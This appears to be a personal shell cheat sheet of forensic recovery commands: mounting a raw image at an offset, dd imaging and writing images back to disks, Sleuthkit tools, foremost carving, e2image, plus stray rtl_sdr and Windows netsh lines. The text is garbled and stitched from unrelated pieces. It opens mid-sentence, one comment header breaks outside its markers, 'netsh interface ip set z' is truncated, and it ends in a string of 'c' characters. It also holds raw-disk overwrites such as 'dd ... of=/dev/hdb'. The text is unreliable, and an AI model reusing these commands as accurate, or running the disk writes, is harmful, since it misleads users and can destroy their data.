echo "## =============================================================================== ##"
echo "## Which will list the start and end cylinders of each partition and the units in  ##"
echo "## Which they’re measured. If the second partition starts at cylinder 80300 and    ##"
echo "## The Units are 512 bytes, then that partition starts at 80300 × 512 = 41,113,600 ##"
echo "##        bytes. In this case, the command you want looks like this:               ##"
echo "## =============================================================================== ##"
mount -o loop,offset=41113600 /mnt/recover/$File.raw /mnt/$Dir

echo "## ==================================================================== ##"
echo "## ============== Write The Image Back onto Another Disk ============== ##"
echo "## ==================================================================== ##"
dd if=/mnt/recovery/$File.raw of=/dev/hdb


dd if=/dev/hda1 of=/mnt/hdb1/$File.img


##-=========================================================-##
##   [+] Monitor The Progress of The Image Being Created:
##-=========================================================-##
watch ls -l /mnt/sdb1/$File.img


The Sleuthkit Command-line tools:
• ils lists inode information from the image.
• ffind finds the file or directory name using the inode.
• icat outputs the file content based on its inode number.


##-=========================================================-##
##   [+] output to the directory from where you ran it:
##-=========================================================-##
foremost $File.dd

##-====================================================-##
##   [+] write them to a specified output directory:
##-====================================================-##
foremost -t all -o /rescue/dir -i $File.dd


##-=========================================================-##
##   [+] Search jpeg format skipping the first 100 blocks
##-=========================================================-##
foremost -s 100 -t jpg -i $File.dd

##-===========================================-##
##   [+] Only generate an audit file,
##   [?] print to the screen (verbose mode)
##-===========================================-##
foremost -av $File.dd

##-=================================-##
##   [+] Search all defined types:
##-=================================-##
foremost -t all -i $File.dd

##-=================================-##
##   [+] Search for gif and pdf's:
foremost -t gif,pdf -i $File.dd


##-====================================================-##
##   [+] Search for office documents and jpeg files
in a Unix file system in verbose mode.:
##-====================================================-##
foremost -vd -t ole,jpeg -i $File.dd

##-==============================-##
##   [+] Run the default case:
##-==============================-##
foremost $File.dd


##-=================================-##
##   [+]
##-=================================-##
e2image -r /dev/hda1 - | bzip2 > hda1.e2i.bz2


tune to 392.0 MHz, and set the sample-rate to 1.8 MS/s, use:

rtl_sdr /tmp/capture.bin -s 1.8e6 -f 392e6


netsh int ipv6 show interfaces
powershell -command "get-netadapter"


netsh interface show interface


netsh interface ip set dnsserver name="Local Area Connection"
static 10.10.10.85 primary


set an IP address, we could just run the command:
C:\> netsh interface ip set address name="Local Area Connection"
static 10.10.10.10 255.255.255.0 10.10.10.1 1


DHCP, we simply run:
C:\> netsh interface ip set z


ccccccccccccccccccccccccc